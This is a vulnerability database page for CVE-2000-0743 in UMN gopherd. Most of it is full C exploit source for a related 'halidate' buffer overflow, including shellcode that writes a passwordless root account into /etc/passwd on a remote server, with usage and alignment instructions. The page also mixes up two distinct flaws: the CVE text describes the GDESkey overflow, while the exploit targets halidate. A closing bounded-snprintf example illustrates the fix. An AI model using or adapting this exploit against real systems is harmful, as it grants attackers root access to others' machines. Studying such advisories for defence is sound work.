CVE-2000-0743
CVSS 10.0
Published: 2000-10-20 00:00:00
Revised: 2008-09-05 16:21:46
NMCOE

[Original] Buffer overflow in University of Minnesota (UMN) gopherd 2.x allows remote attackers to execute arbitrary commands via a DES key generation request (GDESkey) that contains a long ticket value.


[CNNVD] University of Minnesota (UMN) gopherd arbitrary command execution vulnerability (CNNVD-200010-131)

        UMN gopherd 2.x contains a buffer overflow. A remote attacker can execute arbitrary commands via a DES key generation request (GDESkey) that contains an overly long ticket value.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/a:university_of_minnesota:gopherd:2.3.1
cpe:/a:university_of_minnesota:gopherd:2.3

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0743
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0743
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200010-131
(Official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/1569
(VENDOR_ADVISORY)  BID  1569
http://archives.neohapsis.com/archives/bugtraq/2000-08/0112.html
(VENDOR_ADVISORY)  BUGTRAQ  20000810 Remote vulnerability in Gopherd 2.x

- Vulnerability information

University of Minnesota (UMN) gopherd arbitrary command execution vulnerability
Critical  Buffer overflow
2000-10-20 00:00:00 2005-05-02 00:00:00
Remote
        UMN gopherd 2.x contains a buffer overflow. A remote attacker can execute arbitrary commands via a DES key generation request (GDESkey) that contains an overly long ticket value.

- Advisories and patches


- Vulnerability information (20157)

UMN Gopherd 2.x Halidate Function Buffer Overflow Vulnerability (EDBID:20157)
linux remote
2000-08-20 Verified
0 Chris Sharp
N/A
source: http://www.securityfocus.com/bid/1591/info

It is possible to either execute arbitrary code or crash a remote system running University of Minnesota's Gopher Daemon, depending on the data entered. An unchecked buffer exists in the 'halidate' function of Gopherd, where the 512-byte buffer can be overwritten with approximately 600 bytes of data.

/*  (linux)Gopher+[v2.3.1p0-]:  Daemon remote buffer overflow.
    Findings and exploit by: v9[v9@fakehalo.org]. (vade79)

    It is possible to exploit an unchecked sprintf call in the
    "halidate" option in gopherd.c.  This exploit will attempt
    to write a line to /etc/passwd.  (as a superuser)

    The gopher+ daemon has multiple overflows in different
    functions, but most overwrite the pointer(s) with hardcoded
    data from the program which are limited.  But, the
    "halidate" option/call was a little hidden surprise for me.

    When the exploit is successfully executed it adds the line:
    "hakroot::0:0:hacked:/:/bin/sh" to /etc/passwd, with no
    0x0A return, which could cause some problems in some
    situations.  You may have to wait till someone on the box
    modifies their /etc/passwd by adding a user or what not.

   Syntax:
    [syntax]: ./xgopher <target> [port] [offset] [alignment].
    [syntax]: ./xgopher <target> <[port] [-getalignment]>.

   Explanation:
    If you don't know what the alignment of the server is (which
    isn't expected *g*), just type "./xgopher hostname [port]
    -getalignment" and with the alignment you're given type
    "./xgopher hostname <port> <offset> <alignment response you are
    given>".

   Info:
    The following segment is from gopherd.c [line 1076/3453]:
    ("pathname" in the code segment is supplied by the user)

--------------------------------------------------------------------------------
void
OutputAuthForm(int sockfd, char *pathname, char *host, int port, CMDprotocol p)
{
     char tmpbuf[512];
     ...
     sprintf(tmpbuf,
             "<FORM METHOD=\"GET\" ACTION=\"http://%s:%d/halidate%%20%s\">\r\n",
             host, port, pathname);
     ...
}
--------------------------------------------------------------------------------

   Notes:
    This exploit requires that the service is running as root (to
    write to /etc/passwd).  Even if the gopher+ daemon displays
    itself running as another user, as long as its process is
    running as root (uid=0) it should exploit successfully.  Due to
    the server's local host+port character lengths changing, the
    alignment will almost never be the same; I recommend using
    the -getalignment parameter.  You can play as much as you
    want on this, the process is forked and won't crash the
    gopher+ daemon with invalid pointers.  This was also tested
    effective on the 2.3 version of the gopher+ daemon.
    Although this exploit is for linux servers, gopher+ isn't
    just built for linux, it is also supported for BSD, Solaris,
    SunOS, HP-UX and other operating systems.

   Fix:
    Compile with "./configure --disable-auth" (isn't disabled by
    default) and then recompile gopher or wait for a patch.

   Tests:
    Built and tested on slackware 3.6 and slackware 7.0 linux.
    (with lots of junk added to my /etc/passwd *g*)
*/
#define BSIZE 512               // buffer size. (tmpbuf[512] minus server data)
#define PADDING 150             // ret reps. (host+port length guessing room)
#define POINTER 0xbffff65c      // base pointer in which offsets are added.
#define DEFAULT_PORT 70         // default gopher+ daemon port.
#define DEFAULT_OFFSET 0        // default offset. (argument is added)
#define DEFAULT_ALIGN 0         // alignment. (depends on host+port length)
#define TIMEOUT 5               // connection timeout time.
#include <stdio.h>              // headers below this line were missing from the
#include <stdlib.h>             // posted source and are needed to compile it.
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <signal.h>
#include <netinet/in.h>
#include <netdb.h>
int getalignment(char *target,int port);   // prototypes: both are defined after main().
int quit(int i);
static char exec[]= // appends "hakroot::0:0:hacked:/:/bin/sh" to /etc/passwd.
"\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x35\x01\xfb\x30\xe4\x88"
"\x63\x0b\x31\xc9\x66\xb9\x01\x04\x31\xd2\x66\xba\xa4\x01\x31\xc0\xb0\x05\xcd"
"\x80\x89\xc3\x31\xc9\xb1\x5b\x01\xf9\x31\xd2\xb2\x1d\x31\xc0\xb0\x04\xcd\x80"
"\x31\xc0\xb0\x01\xcd\x80\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x01\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x68\x61\x6b\x72\x6f\x6f\x74\x3a\x3a\x30\x3a\x30\x3a"
"\x68\x61\x63\x6b\x65\x64\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73\x68";
// SIGALRM handler: fires when connect() exceeds TIMEOUT seconds.
void timeout(int sig){printf("[timeout]: Connection timeout(%d).\n",TIMEOUT);quit(-1);}
int main(int argc,char **argv){
 // BSIZE+8: room for the last 4-byte store at an unaligned offset (1-3) and
 // the terminating NUL, which the original bof[BSIZE] did not have.
 char bof[BSIZE+8];
 int i,sock,port,offset,align,ga=0;
 long ret=DEFAULT_OFFSET;
 struct hostent *t;
 struct sockaddr_in s;
 printf("*** (linux)Gopherd+[v2.3.1p0-]: Remote buffer overflow, by: v9[v9@fake"
 "halo.org].\n");
 if(argc<2){
  printf("[syntax]: %s <target> [port] [offset] [alignment].\n",argv[0]);
  printf("[syntax]: %s <target> <[port] [-getalignment]>.\n",argv[0]);
  quit(0);
 }
 if(argc>2){
  if(!strcmp(argv[2],"-getalignment")){ga=1;port=DEFAULT_PORT;}
  else{port=atoi(argv[2]);}
 }
 else{port=DEFAULT_PORT;}
 if(argc>3){
  if(!strcmp(argv[3],"-getalignment")){ga=1;}
  else{offset=atoi(argv[3]);}
 }
 else{offset=DEFAULT_OFFSET;}
 if(argc>4){
  if(atoi(argv[4])<0||atoi(argv[4])>3){
   printf("[ignored]: Invalid alignment, using default alignment. (0-3)\n");
   align=DEFAULT_ALIGN;
  }
  else{align=atoi(argv[4]);}
 }
 else{align=DEFAULT_ALIGN;}
 if(ga){getalignment(argv[1],port);}
 else{
  ret=(POINTER+offset);
  printf("[stats]: Addr: 0x%lx, Offset: %d, Align: %d, Size: %d, Padding: %d.\n"
  ,ret,offset,align,BSIZE,PADDING);
  // fill the buffer with the return address (assumes a 32-bit long, as on
  // the linux targets this was written for), then NOP sled, then payload.
  for(i=align;i<BSIZE;i+=4){*(long *)&bof[i]=ret;}
  for(i=0;i<(BSIZE-strlen(exec)-PADDING);i++){*(bof+i)=0x90;}
  memcpy(bof+i,exec,strlen(exec));
  memcpy(bof,"halidate ",9);
  bof[BSIZE]='\0';
  if((s.sin_addr.s_addr=inet_addr(argv[1]))){
   if(!(t=gethostbyname(argv[1]))){
    printf("[error]: Couldn't resolve. (%s)\n",argv[1]);
    quit(-1);
   }
   memcpy((char*)&s.sin_addr,(char*)t->h_addr,sizeof(s.sin_addr));
  }
  s.sin_family=AF_INET;
  s.sin_port=htons(port);
  sock=socket(AF_INET,SOCK_STREAM,0);
  signal(SIGALRM,timeout);
  printf("[data]: Attempting to connect to %s on port %d.\n",argv[1],port);
  alarm(TIMEOUT);
  if(connect(sock,(struct sockaddr*)&s,sizeof(s))){
   printf("[error]: Connection failed. (port=%d)\n",port);
   quit(-1);
  }
  alarm(0);
  printf("[data]: Connected successfully. (port=%d)\n",port);
  printf("[data]: Sending buffer(%d) to server.\n",(int)strlen(bof));
  write(sock,bof,strlen(bof));
  usleep(500000);
  printf("[data]: Closing socket.\n");
  close(sock);
 }
 quit(0);
}
// Sends a bare "halidate" request and derives the stack alignment from
// where two marker bytes ('N' 0x4E and '%' 0x25) land in the server's reply.
int getalignment(char *target,int port){
 char buf[1024];
 int i,j,si=0,sock,math;
 struct hostent *t;
 struct sockaddr_in s;
 memset(buf,0,sizeof(buf));   // keep buf NUL-terminated for strlen() below.
 if((s.sin_addr.s_addr=inet_addr(target))){
  if(!(t=gethostbyname(target))){
   printf("[error]: Couldn't resolve. (%s)\n",target);
   quit(-1);
  }
  memcpy((char*)&s.sin_addr,(char*)t->h_addr,sizeof(s.sin_addr));
 }
 s.sin_family=AF_INET;
 s.sin_port=htons(port);
 sock=socket(AF_INET,SOCK_STREAM,0);
 signal(SIGALRM,timeout);
 printf("[data]: Attempting to connect to %s on port %d.\n",target,port);
 alarm(TIMEOUT);
 if(connect(sock,(struct sockaddr*)&s,sizeof(s))){
  printf("[error]: Connection failed. (port=%d)\n",port);
  quit(-1);
 }
 alarm(0);
 printf("[data]: Connected successfully. (port=%d)\n",port);
 alarm(TIMEOUT);
 write(sock,"halidate \n",10);
 for(i=0;i<2;i++){if(!read(sock,buf,sizeof(buf)-1)){si++;}}
 i=0;while(buf[i]&&!(buf[i]==0x4E)){i++;}
 j=0;while(buf[j]&&!(buf[j]==0x25)){j++;}
 usleep(500000);
 printf("[data]: Closing socket.\n");
 close(sock);
 if(!si||i>=j||strlen(buf)<64){
  printf("[error]: Too minimal or invalid data received to calculate. (try agai"
  "n?)\n");
  quit(-1);
 }
 else{
  math=(i-j-2);
  while(math<0){math+=4;}
  printf("[data]: Alignment calculation: %d.\n",math);
 }
 return math;
}
int quit(int i){
 if(i){
  printf("[exit]: Dirty exit.\n");
  exit(0);
 }
 else{
  printf("[exit]: Clean exit.\n");
  exit(-1);
 }
}
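The root cause quoted above is an unbounded sprintf() of a user-supplied pathname into a 512-byte tmpbuf[]. The following is an added example, not gopherd source or the exploit author's code: it reuses the quoted format string to measure how much output a given pathname produces and shows a bounded replacement that rejects, rather than truncates or overflows, a request that does not fit. The host name, port and TMPBUF_SIZE are assumed values.

```c
#include <stdio.h>
#include <string.h>

/* Constructed example, not gopherd source: the format string quoted from
 * OutputAuthForm() in gopherd.c; TMPBUF_SIZE mirrors its tmpbuf[512]. */
#define TMPBUF_SIZE 512
#define FORM_FMT "<FORM METHOD=\"GET\" ACTION=\"http://%s:%d/halidate%%20%s\">\r\n"

/* Bytes sprintf() would write for these arguments (NUL excluded), measured
 * with snprintf(NULL, 0, ...), which formats without storing anything. */
size_t auth_form_length(const char *host, int port, const char *pathname)
{
    int n = snprintf(NULL, 0, FORM_FMT, host, port, pathname);
    return n < 0 ? 0 : (size_t)n;
}

/* Bounded replacement for the unchecked sprintf(): returns 1 on success, 0
 * when the form plus its NUL would not fit in outsz bytes.  On failure out[]
 * is emptied so a truncated form is never sent to the client. */
int build_auth_form(char *out, size_t outsz, const char *host, int port,
                    const char *pathname)
{
    if (outsz == 0) return 0;
    int n = snprintf(out, outsz, FORM_FMT, host, port, pathname);
    if (n < 0 || (size_t)n >= outsz) {
        out[0] = '\0';
        return 0;
    }
    return 1;
}

/* Does a pathname of pathlen bytes (constructed as 'A's) fit in a
 * TMPBUF_SIZE-byte buffer once the fixed text, host and port are added?
 * With the assumed host "gopher.example" and port 70 the fixed part is
 * 67 bytes, so 444 is the longest pathname that fits. */
int pathname_fits(size_t pathlen)
{
    char tmpbuf[TMPBUF_SIZE], path[1024];
    if (pathlen >= sizeof path) return 0;
    memset(path, 'A', pathlen);
    path[pathlen] = '\0';
    return build_auth_form(tmpbuf, sizeof tmpbuf, "gopher.example", 70, path);
}

int main(void)
{
    /* The ~600-byte request from the advisory overruns the 512-byte buffer. */
    printf("pathname of 600 bytes fits: %d\n", pathname_fits(600));
    printf("pathname of 444 bytes fits: %d\n", pathname_fits(444));
    return 0;
}
```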

- Vulnerability information

1508
UMN Gopher Daemon (gopherd) DES Key Generation Request Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- Vulnerability description

- Timeline

2000-08-10 Unknown
Unknown Unknown

- Solution

Upgrade to version 2.3.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

Unknown or Incomplete

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are kept on MITRE's websites.